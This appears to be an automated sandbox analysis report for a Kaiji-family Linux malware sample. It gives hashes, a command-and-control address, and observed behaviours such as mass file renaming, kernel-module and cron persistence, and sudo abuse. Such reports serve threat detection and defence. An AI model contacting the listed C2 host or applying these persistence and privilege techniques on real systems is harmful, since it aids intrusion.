General

  • Target

    1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4.elf

  • Size

    5.0MB

  • Sample

    241111-ckwx5szfjn

  • MD5

    4147e50daff23cbea5cf1faabb73b576

  • SHA1

    438816933c155b9f3d7e3b5758715b0e32f4cff6

  • SHA256

    1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4

  • SHA512

    92ec9f9f0230566511ee7ddaeb96c4423010299ac2f3318b49174a437c87a338fa354409ebc9b6fe242f0da0b112661a241260043c72c4f9ccf53e0832b4ce9e

  • SSDEEP

    49152:aIJ8Ou+wh2zUVtN9vEaBPC3uIdlLloDH8QEpOGr6KpZd1I1J:ayxyl/N9vROqci

Malware Config

Extracted

Family

kaiji

C2

38.55.251.57:8899

Targets

    • Target

      1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4.elf

    • Size

      5.0MB

    • MD5

      4147e50daff23cbea5cf1faabb73b576

    • SHA1

      438816933c155b9f3d7e3b5758715b0e32f4cff6

    • SHA256

      1805a01f3d3ed529079daf427941f35ac1a808da1c70f416dc4bc0c2068c24a4

    • SHA512

      92ec9f9f0230566511ee7ddaeb96c4423010299ac2f3318b49174a437c87a338fa354409ebc9b6fe242f0da0b112661a241260043c72c4f9ccf53e0832b4ce9e

    • SSDEEP

      49152:aIJ8Ou+wh2zUVtN9vEaBPC3uIdlLloDH8QEpOGr6KpZd1I1J:ayxyl/N9vROqci

    • Kaiji

      Kaiji payload

    • Kaiji family

    • Renames multiple (1040) files with added filename extension

      This suggests ransomware activity of encrypting all the files on the system.

    • Executes dropped EXE

    • Loads a kernel module

      Loads a Linux kernel module, potentially to achieve persistence

    • Abuse Elevation Control Mechanism: Sudo and Sudo Caching

      Abuse sudo or cached sudo credentials to execute code.

    • Creates/modifies Cron job

      Cron allows running tasks on a schedule, and is commonly used for malware persistence.

MITRE ATT&CK Enterprise v15

Tasks